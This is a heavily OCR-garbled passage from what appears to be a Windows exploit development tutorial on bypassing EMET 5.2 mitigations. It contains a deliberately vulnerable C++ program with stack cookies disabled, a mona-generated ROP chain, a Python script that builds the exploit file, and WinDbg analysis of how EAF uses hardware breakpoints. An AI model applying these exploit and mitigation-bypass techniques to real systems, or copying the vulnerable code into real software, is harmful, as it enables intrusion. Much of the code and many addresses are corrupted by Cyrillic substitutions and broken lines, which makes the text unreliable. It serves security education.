block 59: 
block 60: 
block 61: 
block 62: 
block 63: 
block 64: 
block 65: 


address = 0x04180020; size = 1048528 
address = 0x04280020; size = 1048528 
address = 0x04380020; size = 1048528 
address = 0x04480020; size = 1048528 
address = 0x04580020; size = 1048528 
address = 0x04680020; size = 1048528 
address = 0x04780020; size = 1048528 
address = 0x04880020; size = 1048528 
address = 0x04980020; size = 1048528 
address = 0x04a80020; size = 1048528 
address = 0x04b80020; size = 1048528 
address = 0x04c80020; size = 1048528 
address = 0x04d80020; size = 1048528 
address = 0x04e80020; size = 1048528 
address = 0x04f80020; size = 1048528 
address = 0x05080020; size = 1048528 
address = 0x05180020; size = 1048528 
address = 0x05280020; size = 1048528 
address = 0x05380020; size = 1048528 
address = 0x05480020; size = 1048528 
address = 0x05580020; size = 1048528 
address = 0x05680020; size = 1048528 
address = 0x05780020; size = 1048528 
address = 0x05880020; size = 1048528 
address = 0x05980020; size = 1048528 
address = 0x05a80020; size = 1048528 
address = 0x05b80020; size = 1048528 
address = 0x05c80020; size = 1048528 
address = 0x05d80020; size = 1048528 
address = 0x05e80020; size = 1048528 
address = 0x05f80020; size = 1048528 
address = 0x06080020; size = 1048528 
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Боск 66: 
block 67: 
block 68: 
block 69: 
block 70: 
block 71: 
block 72: 
block 73: 
block 74: 
block 75: 
block 76: 
block 77: 
block 78: 
block 79: 
block 80: 
Боск 81: 
block 82: 
Боск 83: 
block 84: 
block 85: 
block 86: 
block 87: 
block 88: 
block 89: 
block 90: 
block 91: 
block 92: 
block 93: 
block 94: 
block 95: 
block 96: 
block 97: 


address = 0x06180020; size = 1048528 
address = 0x06280020; size = 1048528 
address = 0x06380020; size = 1048528 
address = 0x06480020; size = 1048528 
address = 0x06580020; size = 1048528 
address = 0x06680020; size = 1048528 
address = 0x06780020; size = 1048528 
address = 0x06880020; size = 1048528 
address = 0x06980020; size = 1048528 
address = 0x06a80020; size = 1048528 
address = 0х06680020; size = 1048528 
address = 0x06c80020; size = 1048528 
address = 0x06d80020; size = 1048528 
address = 0x06e80020; size = 1048528 
address = 0х06180020; size = 1048528 
address = 0x07080020; size = 1048528 
address = 0x07180020; size = 1048528 
address = 0x07280020; size = 1048528 
address = 0x07380020; size = 1048528 
address = 0x07480020; size = 1048528 
address = 0x07580020; size = 1048528 
address = 0x07680020; size = 1048528 
address = 0x07780020; size = 1048528 
address = 0x07880020; size = 1048528 
address = 0x07980020; size = 1048528 
address = 0x07a80020; size = 1048528 
address = 0x07b80020; size = 1048528 
address = 0x07c80020; size = 1048528 
address = 0x07d80020; size = 1048528 
address = 0x07e80020; size = 1048528 
address = 0x07f80020; size = 1048528 
address = 0x08080020; size = 1048528 
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block 98: address = 0x08180020; size = 1048528 

block 99: address = 0x08280020; size = 1048528 

block 100: address = 0x08380020; size = 1048528 
block 101: address = 0x08480020; size = 1048528 
block 102: address = 0x08580020; size = 1048528 
block 103: address = 0x08680020; size = 1048528 
block 104: address = 0x08780020; size = 1048528 
block 105: address = 0x08880020; size = 1048528 
block 106: address = 0x08980020; size = 1048528 
block 107: address = 0x08a80020; size = 1048528 
block 108: address = 0x08b80020; size = 1048528 
block 109: address = 0x08c80020; size = 1048528 
block 110: address = 0x08d80020; size = 1048528 
block 111: address = 0x08e80020; size = 1048528 
block 112: address = 0x08f80020; size = 1048528 
block 113: address = 0x09080020; size = 1048528 
block 114: address = 0x09180020; size = 1048528 
block 115: address = 0x09280020; size = 1048528 
block 116: address = 0x09380020; size = 1048528 
block 117: address = 0x09480020; size = 1048528 
block 118: address = 0x09580020; size = 1048528 
block 119: address = 0x09680020; size = 1048528 
block 120: address = 0x09780020; size = 1048528 
block 121: address = 0x09880020; size = 1048528 
block 122: address = 0x09980020; size = 1048528 
block 123: address = 0x09a80020; size = 1048528 
block 124: address = 0x09b80020; size = 1048528 
block 125: address = 0x09c80020; size = 1048528 
block 126: address = 0x09d80020; size = 1048528 
block 127: address = 0x09e80020; size = 1048528 
block 128: address = 0x09f80020; size = 1048528 
block 129: address = 0x0a080020; size = 1048528 
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block 130: address = 0x0a180020; size = 1048528 
block 131: address = 0х0а280020; size = 1048528 
block 132: address = 0x0a380020; size = 1048528 
block 133: address = 0x0a480020; size = 1048528 
block 134: address = 0x0a580020; size = 1048528 
block 135: address = 0х0а680020; size = 1048528 
block 136: address = 0x0a780020; size = 1048528 
block 137: address = 0x0a880020; size = 1048528 
block 138: address = 0x0a980020; size = 1048528 
block 139: address = 0x0aa80020; size = 1048528 
block 140: address = 0x0ab80020; size = 1048528 
block 141: address = 0x0ac80020; size = 1048528 
block 142: address = 0x0ad80020; size = 1048528 
block 143: address = 0x0ae80020; size = 1048528 
block 144: address = 0x0af80020; size = 1048528 
block 145: address = 0х06080020; size = 1048528 
block 146: address = 0x0b180020; size = 1048528 
block 147: address = 0x0b280020; size = 1048528 
block 148: address = 0x0b380020; size = 1048528 
block 149: address = 0x0b480020; size = 1048528 
block 150: address = 0x0b580020; size = 1048528 
block 151: address = 0х06680020; size = 1048528 
block 152: address = 0х06780020; size = 1048528 
block 153: address = 0x0b880020; size = 1048528 
block 154: address = 0х06980020; size = 1048528 
block 155: address = 0x0ba80020; size = 1048528 
block 156: address = 0х06680020; size = 1048528 
block 157: address = 0х06с80020; size = 1048528 
block 158: address = 0x0bd80020; size = 1048528 
block 159: address = 0x0be80020; size = 1048528 
block 160: address = 0х00180020; size = 1048528 
block 161: address = 0x0c080020; size = 1048528 
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block 162: address = 0x0c180020; size = 1048528 
block 163: address = 0х0с280020; size = 1048528 
block 164: address = 0x0c380020; size = 1048528 
block 165: address = 0х0с480020; size = 1048528 
block 166: address = 0x0c580020; size = 1048528 
block 167: address = 0x0c680020; size = 1048528 
block 168: address = 0х0с780020; size = 1048528 
block 169: address = 0x0c880020; size = 1048528 
block 170: address = 0x0c980020; size = 1048528 
block 171: address = Ох0са80020; size = 1048528 
block 172: address = 0x0cb80020; size = 1048528 
block 173: address = 0x0cc80020; size = 1048528 
block 174: address = 0x0cd80020; size = 1048528 
block 175: address = 0х0се80020; size = 1048528 
block 176: address = 0х0сї80020; size = 1048528 
block 177: address = 0x0d080020; size = 1048528 
block 178: address = 0x0d180020; size = 1048528 
block 179: address = 0x0d280020; size = 1048528 
block 180: address = 0x0d380020; size = 1048528 
block 181: address = 0x0d480020; size = 1048528 
block 182: address = 0x0d580020; size = 1048528 
block 183: address = 0x0d680020; size = 1048528 
block 184: address = 0x0d780020; size = 1048528 
block 185: address = 0x0d880020; size = 1048528 
block 186: address = 0x0d980020; size = 1048528 
block 187: address = 0x0da80020; size = 1048528 
block 188: address = 0x0db80020; size = 1048528 
block 189: address = 0x0dc80020; size = 1048528 
block 190: address = 0x0dd80020; size = 1048528 
block 191: address = 0x0de80020; size = 1048528 
block 192: address = 0х00#80020; size = 1048528 
block 193: address = 0x0e080020; size = 1048528 
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block 194: address = 0x0e180020; size = 1048528 
block 195: address = 0x0e280020; size = 1048528 
block 196: address = 0x0e380020; size = 1048528 
block 197: address = 0x0e480020; size = 1048528 
block 198: address = 0x0e580020; size = 1048528 
block 199: address = 0x0e680020; size = 1048528 
block 200: address = 0x0e780020; size = 1048528 
block 201: address = 0x0e880020; size = 1048528 
block 202: address = 0x0e980020; size = 1048528 


Index of block to mutate (-1 to exit): 0 


1) Multiplier 


2) LowerCaser 
3) Exit 
Your choice [1-3]: 1 





As soon as we complete this sequence, the calculator pops up! 


- 232 - 





EXPLOIT DEVELOPMENT COMMUNITY 


EMET 5.2 


The acronym EMET stands for Enhanced Mitigation Experience Toolkit. As of this writing, the latest version 
of EMET is 5.2 (download). 


As always, we'll be working on Windows 7 SP1 64-bit. 


Warning 


EMET 5.2 may conflict with some Firewall and AntiVirus software. For instance, | spent hours wondering 
why EMET would detect exploitation attempts even where there were none. Eventually, | found out that it 
was a conflict with Comodo Firewall. | had to uninstall it completely. 


Good Firewalls аге not common so | left Comodo Firewall alone and decided to work in a Virtual Machine (I 
use VirtualBox). 


Protections 
As the name suggests, EMET tries to mitigate the effects of exploits. It does this by introducing the following 
protections: 


1: Data Execution Prevention (DEP) 
It stops the execution of instructions if they are located in areas of memory marked as no execute. 
2. Structured Exception Handler Overwrite Protection (SEHOP) 


It prevents exploitation techniques that aim at overwriting Windows Structured Exception Handler. 

3. Null Page Protection (NullPage) 
It pre-allocates the null page to prevent exploits from using it with malicious purpose. 

4. Heap Spray Protection (HeapSpray) 
It pre-allocates areas of memory the are commonly used by attackers to allocate malicious code. 
(For instance, 0Ox0a040a04; 0x0a0a0a0a; OxObObObOb; OxOcOcOcOc; Ox0d0d0d0d; 0x0e0e0e0e; 
0x04040404; 0x05050505; 0x06060606; 0x07070707; 0x08080808; 0x09090909; 0x20202020; 
0x14141414) 

5. Export Address Table Access Filtering (EAF) 
It regulates access to the Export Address Table (EAT) based on the calling code. 

6. Export Address Table Access Filtering Plus (ЕАР+) 
It blocks read attempts to export and import table addresses originating from modules commonly used to 
probe memory during the exploitation of memory corruption vulnerabilities. 

7. Mandatory Address Space Layout Randomization (MandatoryASLR) 
It randomizes the location where modules are loaded in memory, limiting the ability of an attacker to point 
to pre-determined memory addresses. 

8. Bottom-Up Address Space Layout Randomization (BottomUpASLR) 
It improves the MandatoryASLR mitigation by randomizing the base address of bottom-up allocations. 

9. Load Library Protection (LoadLib) 
It stops the loading of modules located in UNC paths (e.g. \\evilsite\bad.dll), common technique in Return 
Oriented Programming (ROP) attacks. 
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10. ( ) 


It disallows marking memory areas on the stack, common technique in Return Oriented 
Programming (ROP) attacks. 

11. ( ) 
It stops the execution of critical functions if they are reached via a instruction, common technigue in 
Return Oriented Programming (КОР) attacks. 

12. 


It reproduces the execution flow after the return address, trying to detect Return Oriented Programming 
(ROP) attacks. 

13. ( ) 
It checks if the stack pointer is changed to point to attacker-controlled memory areas, common technique 
in Return Oriented Programming (ROP) attacks. 

14. ( ) 


It prevents defined modules from being loaded in the address space of the protected process. 


This sounds pretty intimidating, doesn't it? But let's not give up before we even start! 


The program 

To analyze EMET with ease is better to use one of our little applications. We're going to reuse 
( ) but with some modifications: 

С++ 


#include <cstdio> 


_declspec(noinline) int f() { 
char name[32]; 
printf("Reading name from file...\n"); 


FILE *f = fopen("c:\\deleteme\\name.dat", "rb"); 
(!f) 


fseek(f, OL, SEEK_END); 
long bytes = ftell(f); 
fseek(f, OL, SEEK_SET); 
fread(name, 1, bytes, f); 
name[bytes] = '\0'; 
fclose(f); 


printf("Hi, %$!\п", name); 
mek 


} 


int main() { 
char moreStack[10000]; 
(int i = 0; i < sizeof(moreStack); ++i) 
moreStack[i] = i; 


f(); 
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The stack variable moreStack gives us more space on the stack. Remember that the stack grows towards 
low addresses whereas fread writes going towards high addresses. Without this additional space on the 
stack, fread might reach the end of the stack and crash the program. 


The for loop in main is needed otherwise moreStack is optimized away. Also, if function f is inlined, the 
buffer name is allocated after moreStack (i.e. towards the end of the stack) which defeats the purpose. To 
avoid this, we need to use _declspec(noinline). 


As we did before, we'll need to disable stack cookies, but leave DEP on, by going to Project—properties, 
апа modifying the configuration for Release as follows: 


• Configuration Properties 
о С/С++ 
. Code Generation 
. Security Check: Disable Security Check (/GS-) 


Make sure that DEP is activated: 


• Configuration Properties 
о Linker 
. Advanced 
. Data Execution Prevention (DEP): Yes (/МХСОМРАТ) 


ASLR considerations 


We know that to beat ASLR we need some kind of info leak and in the next two chapters we'll develop 
exploits for Internet Explorer 10 and 11 with ASLR enabled. But for now, let’s ignore ASLR and concentrate 
on DEP and ROP. 


Our program exploitme3 uses the library msvcr120.dll. Unfortunately, every time the program is run, the 
library is loaded at a different address. We could build our ROP chain from system libraries (kernel32.dll, 
ntdil.dil, etc...), but that wouldn't make much sense. We went to great lengths to build a reliable shellcode 
which gets the addresses of the AP! functions we want to call by looking them up in the Export Address 
Tables. If we were to hardcode the addresses of the gadgets taken from kernel32.dll and ntdll.dll then it'd 
make sense to hardcode the addresses of the API functions as well. 


So, the right thing to do is to take our gadgets from msvcr120.dll. Unfortunately, while the base addresses of 
kernel32.dll and ntdll.dl! change only when Windows is rebooted, as we've already said, the base address of 
msvocr120.dll changes whenever exploitme3 is run. 


The difference between these two behaviors stems from the fact that kernel32.dll and ntdll.dll are already 
loaded in memory when exploitme3 is executed, whereas msvcr120.dll is not. Therefore, one solution is to 
run the following program: 


С++ 
#include <Windows.h> 
#include <stdio.h> 
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#include <conio.h> 


int main() { 
printf("msver120 = %р\п", GetModuleHandle(L"msver120")); 


printf("--- press any key ---\n"); 
_getch(); 


turn 
2M 





As long as we don't terminate this program, the base address of won't change. When we run 
, Windows will see that is already loaded in memory so it'll simply map it in the 

address space of . Moreover, will be mapped at the same address because it 

contains which wouldn't work if placed at a different position. 

Initial Exploit 

Open EMET and click on the button 


Enabled 


a | Running ЕМЕТ 
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Now click on and choose : 


Add 


Add / 


a 
с 


б 
ы 
т 


.|LoadLib |МетРг 


« 
« 


Acrobat.exe 
AcCroRd32.exe 
EXCEL.EXE 
iexplore.exe 
INFOPATH.EXE 
java.exe 
java.exe 
java.exe 
javaw.exe 
javaw.exe 
javaw.exe 
javaws.exe 
javaws.exe 
javaws.exe 
ГҮНС.ЕХЕ 
MSACCESS.EXE 
MSPUB.EXE 
015.ЕХЕ 
OUTLOOK.EXE 
РОМЈЕКРНТ.ЕХЕ 
PPTVIEW.EXE 
VISIO.EXE 
VPREVIEW.EXE 
WINWORD.EXE 
wordpad.exe 


ра іса рса са А « «IK КУ сауса КУКА KK ПУКУ У «l ilii «lili 
4 іса рса У А рса усас сауса сиу усас иса сае уч ис сус усі: 
Б іса рса иса усаа уса АНА и-и са. А с ИЗА | 
Є ИЖ Л УНИЈУ Ж ааа «lili 
«IKIKIKIKIKI ЖЖ ИЖ И 
ССС 6] 5015 ы ИУ У УУ И 
© ГЄ [6] [6] 6] КУПУ КО УНУКУ У KIKIKIKIK&IKIK)XIK 

чаю 

юм к 
кк 
как 


кк 





You should see that has been added to the list: 
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м) Deep Hooks v^ Anti Detou 


Add Application Add Wildcard К Т А v Banned Functions 
Selected ҚАР ақ MAN 


Add / Ветом Default Action Mitigation Settings 


Mitigations 


Clear 


App Name SEHOP  |NullPag вар5... |EA БАР- Manda... Bottom... LoadLib |МетрРго | Caller 


< 


v 
v 


« 
« 
< 
< 
< 


Acrobat.exe 
AcroRd32.exe 
EXCEL.EXE 


iexplore.exe 
INFOPATH.EXE 
java.exe 
java.exe 
java.exe 
javaw.exe 
javaw.exe 
javaw.exe 
javaws.exe 
javaws.exe 
javaws.exe 
LYNC.EXE 
MSACCESS.EXE 
MSPUB.EXE 
OIS.EXE 
OUTLOOK.EXE 
POWERPNT.EXE 
PPTVIEW.EXE 
VISIO.EXE 
VPREVIEW.EXE 
WINWORD.EXE 
wordpad.exe 


ые «li «ll «Il УНУКА lll ili Im) << 
«I KIKI KIKI «1 KIKI) KIKIKIIKIKIKIKIKIKIKIK)KIIKIXIKIEK! к 
«I KI 5] KIKI «I KI «I KIKI KIKI KIKI KIKIKI KIKI!) О IK 
ОК KI) «lI Kl Kl «lil Klin Kl Kl KIKI KIKI KIKI) О IK 
«I KIKI KIKI XI KIKI KIKIKIIKIIKIKIIKIKIKIKIKIKIKIIKIgKI X 
чая 
юм «memi 
Ос ж kl ч«як 
юм 
| як << << © 
с ы ы 51 16516) 56 615151 ыыы ы IT) << 


KIKIKI KIKK КИК 





Let's start by disabling EAF, LoadLib, MemProt, Caller, SimExecFlow and StackPivot: 
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| Banned Fu 


Mitigati 


Acrobat.exe 
AcroRd32.exe 
EXCEL.EXE 
exploitme3.exe 


< 


iexplore.exe 
INFOPATH.EXE 
java.exe 


java.exe 


java.exe 
javaw.exe 
javaw.exe 
javaw.exe 
javaws.exe 
javaws.exe 
javaws.exe 
LYNC.EXE 
MSACCESS.EXE 
MSPUB.EXE 
OIS.EXE 
OUTLOOK.EXE 
POWERPNT.EXE 
PPTVIEW.EXE 
VISIO.EXE 
VPREVIEW.EXE 
WINWORD.EXE 
wordpad.exe 


ые «li «ll «Il УНУКА lll ili Im) << 
«I KIKI KIKI KIKIKIKIKIKIKIKIKIKIKIKIKIKIKIK)NIIEKI K] IK 
«I KI 5] KIKI «I KI «I KIKI KIKI KIKI KIKIKI KIKI!) О IK 
«lI K KIKI «I KIKI «lI «kl KI lil ы KIKI О ы 4. 
чаю К TA 
чак 
юм НАИСА СУ 
J У] KIKI У О ИУ У У УУ У О ИО ИУ У О И 
юм 
| чек X 
(< И А Т И 


4 61/1 КИК 





Press to confirm the settings. 


Now let’s load іп ( )and use ( ) to generate а for 


Јоаа pykd.pyd 


!ру mona rop -m msvcr120 





Here's the ROP chain found in the file created by mona: 
Python 
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Ї id =Í 
0x7053fc6f, 
0x7053fc6f, 
0x704f00f6, 
0x00000201, 
0x704b6580, 
0x00000040, 
Ox7049f8cb, 3 
0x705658f2, 
0x7048f95c, 
0x7048f607, 
0x704eb436, 
0x70493a17, 
0x7053b8fb, 
0х705651а4, 
0x7053b7f9, 
0х704р7е50, 


We've already seen how this chain works in the chapter Exploitme3 (DEP), so we won't repeat ourselves. 


We'll also take the script to generate the file from the same chapter and modify it as needed. This 
is the initial version: 


Python 
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= 0x73c60000 


- 0х70480000 _ 


f create rop chain( 
adgets = | 
| + 0x7053fc6f, 
| + 0x7053fc6f, 
+ 0х70410016, 


1 + 0x704b6580, 
0x00000040, H 
md + 0x7049f8cb, 

id + 0x705658f2, 
id + 0x7048f95c, 
id + 0x7048f607, 
id + 0x704eb436, 
id + 0x70493a17, 
| + 0x7053b8fb, 
+ 0x705651a4, 

+ 0x7053b7f9, | 
| + 0x704b7e5d, 
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write_file(r'c:\deleteme\name.dat') 


Note that you need to assign to the variable msvcr120 the correct value. Remember to run and keep open 
the little program we talked about to stop msvcr120.dll from changing base address. That little program also 
tells us the current base address of msvcr120.dll. 


Now run exploitme3.exe and the calculator will pop up! 


EAF 


Let’s enable EAF protection for exploitme3 and run exploitme3 again. This time EMET detects our exploit 
and closes exploitme3. The official description of EAF says that it 


regulates access to the Export Address Table (EAT) based on the calling code. 


As a side note, before debugging exploitme3.exe, make sure that exploitme3.pdb, which contains debugging 
information, is in the same directory as exploitme3.exe. 


Let's open exploitme3 in WinDbg (Сігі-Е), then put a breakpoint on main: 


bp exploitme3!main 


When we hit F5 (go), we get an odd exception: 


(f74.c20): Single step exception - code 80000004 (first chance) 

First chance exceptions are reported before any exception handling. 

This exception may be expected and handled. 

eax=000bff98 ebx=76462a38 ecx=00000154 edx=763a0000 esi=7645ff70 edi=764614e8 
eip=76ec01ae esp=003ef214 ebp=003ef290 iopl=0 nv up ei ng nz na pe cy 
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000287 
ntdll!LdrpSnapThunk+0x1c1: 

76ec01ae 03c2 add еах,едх 





Неге’$ the code: 


76ec018e #7618 push dword ptr [esi+18h] 
76ec0191 ff75e0 push dword ptr [ebp-20h] 
76ес0194 е8 19020000 call  ntdll!LdrpoNameToOrdinal (7бес0362) 


76ec0199 8b55d8 том edx,dword ріг [ебр-28ћ] 


76ec019c Ofb7c0 movzx еах,ах 


76ec019f Ofb7c8 movzx есх,ах 
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76ec01a2 3b4e14 стр ecx,dword ptr [esi* 14h] 
76ec01a5 0f83b6f60000 jae паі! агрЅпарТһипк+0х1206 (76ecf861) 


76ec01ab 8b461c mov  eax,dword ptr [esi+1Ch] < this generated the exception 
76ec01ae 03c2 add _ eax,edx 

76ec01b0 8d0c88 lea есх,[еах+есх*4] 

76ec01b3 8b01 mov  eax,dword ptr [ecx] 

76ec01b5 03c2 add еах,едх 

76ec01b7 8b7d14 mov edi,dword ptr [ebp+14h] 

76ec01ba 8907 mov амога ptr [edi],eax 

76ec01bc 3bc6 стр еах,еѕі 

76ec01be 0187са990000 ја nidil!LdrpSnapThunk+0x1d7 (76ec9b8e) 

76ec01c4 833900 стр dword ptr [есх],0 





A single step exception is a debugging exception. It's likely that the exception was generated by the 
previous line of code: 


76ec01ab 86461с mov eax,dword ptr [esit1Ch] < this generated the exception 





Let’s see what esi points to: 


0:000> In @esi 
(7645ff70) kernel32!$$VProc_ImageExportDirectory | (76480000) kernel32!BasepAllowResourceConversion 
Exact matches: 


kernel32!$$VProc ImageExportDirectory = «no type information? 





It seems that esi points to kernel32's EAT! We can confirm that esi really points to the Export Directory 
(another name for EAT) this way: 


0:000» !dh kernel32 


File Type: DLL 
FILE HEADER VALUES 


14C machine (i386) 


4 number of sections 


53159A85 time date stamp Tue Mar 04 10:19:01 2014 
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0 file pointer to symbol table 
0 number of symbols 
EO size of optional header 
2102 characteristics 
Executable 
32 bit word machine 


DLL 


OPTIONAL HEADER VALUES 
10B magic £ 
9.00 linker version 
00000 size of code 
30000 size of initialized data 
0 size of uninitialized data 
13293 address of entry point 
10000 base of code 


763а0000 image base 
10000 section alignment 
10000 file alignment 
3 subsystem (Windows CUI) 


6.01 operating system version 


6.01 image version 
6.01 subsystem version 
110000 size of image 
10000 size of headers 
1105AE checksum 
00040000 size of stack reserve 
00001000 size of stack commit 
00100000 size of heap reserve 
00001000 size of heap commit 
140 DLL characteristics 





Dynamic base 
NX compatible 
BFF7O[ A9B1] address of Export Director 
CA924[  1F4] address of Import Directory 
(40101019 [ 528] address of Resource Directory 
01 0] address of Exception Directory 


of 0] address of Security Directory 
100000 [ AD9C] address of Base Relocation Directory 
D0734 [ 38] address of Debug Directory 


Of 0] address of Description Directory 
of 0] address of Special Directory 
Of 0] address of Thread Storage Directory 
83510[ 40] address of Load Configuration Directory 
Of 0] address of Bound Import Directory 
10000[ DFO] address of Import Address Table Directory 
Of 0] address of Delay Import Directory 
Of 0] address of COR20 Неадег Directory 


of 0] address of Reserved Directory 


SECTION HEADER #1 
.text name 
C0796 virtual size 
10000 virtual address 
00000 size of raw data 
10000 file pointer to raw data 
0 file pointer to relocation table 
0 file pointer to line numbers 
0 number of relocations 
0 number of line numbers 
60000020 flags 
Соде 





(no align specified) 


Execute Read 


Debug Directories(2) 


Type Size Address Pointer 


26 40770 40770 Format: RSDS, guid, 2, wkernel32.pdb 
d076c d076c 


SECTION HEADER #2 
.data name 
100C virtual size 
E0000 virtual address 
10000 size of raw data 
E0000 file pointer to raw data 
0 Ме pointer {о relocation table 
0 file pointer to line numbers 
0 number of relocations 
0 number of line numbers 
C0000040 flags 
Initialized Data 
(no align specified) 
Read Write 


SECTION HEADER #3 
src name 
528 virtual size 
F0000 virtual address 
10000 size of raw data 
F0000 file pointer to raw data 
0 Ме pointer to relocation table 


0 file pointer to line numbers 
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О number of relocations 
0 number of line numbers 
40000040 flags 


Initialized Data 


(no align specified) 


Read Only 


SECTION HEADER #4 
.reloc name 
AD9C virtual size 
100000 virtual address 
10000 size of raw data 
100000 file pointer to raw data 
0 file pointer to relocation table 
0 file pointer to line numbers 
0 number of relocations 
0 number of line numbers 
42000040 flags 
Initialized Data 
Discardable 
(no align specified) 
Read Only 





We can see that esi points indeed to the Export Directory: 


0:000» 2 @esi == кете!32 + bff70 


Evaluate expression: 1 - 00000001 (1 means True) 





The instruction which generated the exception accessed the Export Directory at offset Ох1с. Let's see what 
there is at that offset by having a look at the file winnt.h: 


С++ 


typedef struct IMAGE EXPORT DIRECTORY ( 
DWORD Characteristics; 


DWORD TimeDateStamp; 
WORD  MajorVersion; 
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WORD  MinorVersion; 
DWORD Мате; 

DWORD Base; 

DWORD NumberOfFunctions; 
DWORD NumberOfNames; 


DWORD AddressOfFunctions; 
DWORD AddressOfNames; 
DWORD AddressOfNameOrdinals; 
} МАСЕ EXPORT DIRECTORY, *PIMAGE EXPORT DIRECTORY; 





In the chapter Shellcode we saw that AddressOfFunctions is the RVA of an array containing the RVAs of the 
exported functions. 


By looking at the stack trace we realize that we're in the function GetProcAddress: 


0:000» К 10 

ChildEBP RetAddr 

003ef290 76ec032a пїдї!!! агр5парТһипк+0х1с1 

003ef34c 76ec0202 ntdll!LdrGetProcedureAddressEx+0x1ca 

003ef368 76261659 ntdll!LdrGetProcedureAddress+0x18 

003ef390 73c8d45e KERNELBASE!GetProcAddress+0x44 

003ef3a4 73c8ca0d MSVCR120! crtLoadWinApiPointers-*Ox1d [f:\dd\vctools\crt\crtw32\misc\winapisupp.c @ 752] 
003ef3a8 73с8са91 MSVCR120!_ mtinit+Ox5 [f\dd\vctools\crt\crtw32\startup\tidtable.c @ 97] 
003ef3d8 73c71a5f MSVCR120!__ CRTDLL_INIT+0x2f [f:\dd\vctools\crt\crtw32\dllstufficrtlib.c @ 235] 
003ef3ec 7бес99а0 MSVCR120!_CRTDLL_INIT+0x1c [f:\dd\vctools\crt\crtw32\dllstufficrtlib.c @ 214] 
003ef40c 76ecd939 та  дгрса ти Кошпе+0ох14 

003ef500 7беабабс ntdll!LdrpRunlnitializeRoutines+0x26f 

003ef680 7беа5326 Na ro |  дгрјпшангеРгосез5+0х1400 

003ef6d0 76ec9ef9 ntdll! Ldrplnitialize*0x78 

003ef6e0 00000000 ntdll!Ldrinitialize Thunk*0x10 





Since it's the first time we've seen such an exception, it must be EMET's doing. It seems that EMET's EAF 
intercepts any accesses to the field AddressOfFunctions of some Export Directories. Which ones? And how 
does it do that? 


In WinDbg, we could do such a thing by using ba, which relies on hardware breakpoints, so EMET must be 
using the same method. Let's have a look at the debug registers: 


0:000» rM 20 
dr0=76ea0204 dr1=7645ff8c dr2=7628b85c 


dr3=00000000 dr6=ffffOff2 dr7=Offf0115 
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ntdll!LdrpSnapThunk+0x1c1: 


тбес01ае 03c2 add eax,edx 





(When you don't know a command, look it up with .hh.) 


The value in dr1 looks familiar: 


0:000» 2 @dr1 == еѕі+1с 
Evaluate expression: 1 - 00000001 





Perfect match! 


Debug Registers 


Let’s be honest here: there’s no need to learn the format of the debug registers. It’s pretty clear that in our 
case 0г0, dri and dr2 contain the addresses where the hardware breakpoints are. Let's see where they 
point (we've already looked at dr‘): 


0:000> In drO 

(76ea01e8) ntdll!$$VProc ImageExportDirectory*Ox1c | (76eaf8a0) ntdllINtMapUserPhysicalPagesScatter 
0:000> In dr1 

(7645ff70) kernel32!$$VProc_ImageExportDirectory+Ox1c | (76480000) kernel32!BasepAllowResourceConversion 
0:000> In аг2 


(76288с60) KERNELBASE! NULL IMPORT DESCRIPTOR-40x2bac | (76291000) KERNELBASE!KernelBaseGlobalD 
ata 





The first two points to the Export Directories of ntdll and kernel32 respectively, while the third one looks 
different. Let's see: 


0:000» !dh kernelbase 


File Type: DLL 
FILE HEADER VALUES 
14C machine (i386) 
4 number of sections 
53159A86 time date stamp Tue Mar 04 10:19:02 2014 


0 file pointer to symbol table 


0 number of symbols 
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EO size of optional header 
2102 characteristics 
Executable 
32 bit word machine 
DLL 


OPTIONAL HEADER VALUES 
10B magic # 
9.00 linker version 
3F800 size of code 
4400 size of initialized data 
0 size of uninitialized data 
74C1 address of entry point 
1000 base of code 


76250000 image base 
1000 section alignment 
200 file alignment 
3 subsystem (Windows CUI) 


6.01 operating system version 


6.01 image version 
6.01 subsystem version 
47000 size of image 
400 size of headers 
49E52 checksum 
00040000 size of stack reserve 
00001000 size of stack commit 
00100000 size of heap reserve 
00001000 size of heap commit 
140 DLL characteristics 
Dynamic base 


NX compatible 





3B840[ 4F19]address of Export Directory 
38C9C[  28]address of Import Directory 
43000[ 530] address of Resource Directory 
of 0] address of Exception Directory 
01 0] address of Security Directory 
44000[ 25FO] address of Base Relocation Directory 
1660[ 1С] ааагеѕѕ of Debug Directory 
Of 0] address of Description Directory 
of 0] address of Special Directory 
Of 0] address of Thread Storage Directory 
69DO| 40] address of Load Configuration Directory 
0 [ 0] address of Bound Import Directory 
1000[ 654] address of Import Address Table Directory 
Of 0] address of Delay Import Directory 
Of 0] address of COR20 Header Directory 


Of 0] address of Reserved Directory 


SECTION HEADER #1 
.text name 
3F759 virtual size 
1000 virtual address 
3F800 size of raw data 
400 file pointer to raw data 
0 file pointer to relocation table 
0 file pointer to line numbers 
0 number of relocations 
0 number of line numbers 
60000020 flags 
Code 


(no align specified) 


Execute Read 





Debug Directories(1) 
Type Size Address Pointer 


су 28 6a18  5e18 Format: RSDS, guid, 1, wkernelbase.pdb 


SECTION HEADER #2 
.data name 
1128 virtual size 
41000 virtual address 
400 size of raw data 
ЗЕСОО file pointer to raw data 
0 file pointer to relocation table 
0 file pointer to line numbers 
0 number of relocations 
0 number of line numbers 
C0000040 flags 
Initialized Data 
(no align specified) 
Read Write 


SECTION HEADER #3 
src name 
530 virtual size 
43000 virtual address 
600 size of raw data 
40000 file pointer to raw data 
0 file pointer to relocation table 
0 file pointer to line numbers 
0 number of relocations 
0 number of line numbers 


40000040 flags 
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Initialized Data 
(no align specified) 
Read Only 


SECTION HEADER #4 
.reloc name 
2A18 virtual size 
44000 virtual address 
2C00 size of raw data 
40600 file pointer to raw data 
0 file pointer to relocation table 
0 file pointer to line numbers 
0 number of relocations 
0 number of line numbers 
42000040 flags 
Initialized Data 


Discardable 


(no align specified) 
Read Only 
0:000> 2 kernelbase+3B840+1c 
Evaluate expression: 1982380124 = 7628b85c < 
0:000> ? @dr2 
Evaluate expression: 1982380124 = 7628b85c < 





No, false alarm: dr2 points to the Export Directory of KERNELBASE! 


Anyway, just for our curiosity, let’s have a look at the Intel Manuals (3B). Here’s the format of the debug 
registers: 
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31 30 29 28 27 26 25 24 23 22 21 20 1918 1716 1514 13 1211109 8 7 6 5 4 


16151413 1211109 87 6 5 4 


Reserved (set to 1) 


Breakpoint 3 Linear Address 
Breakpoint 2 Linear Address 
Breakpoint 1 Linear Address 


Breakpoint 0 Linear Address 


| | Reserved 





It's quite clear that registers E and specify the addresses of the breakpoints. Register 
is a status register which reports information about the last debug exception, whereas contains 
the settings for the 4 breakpoints. If you are interested in the specifics, have a look at the manual yourself. 
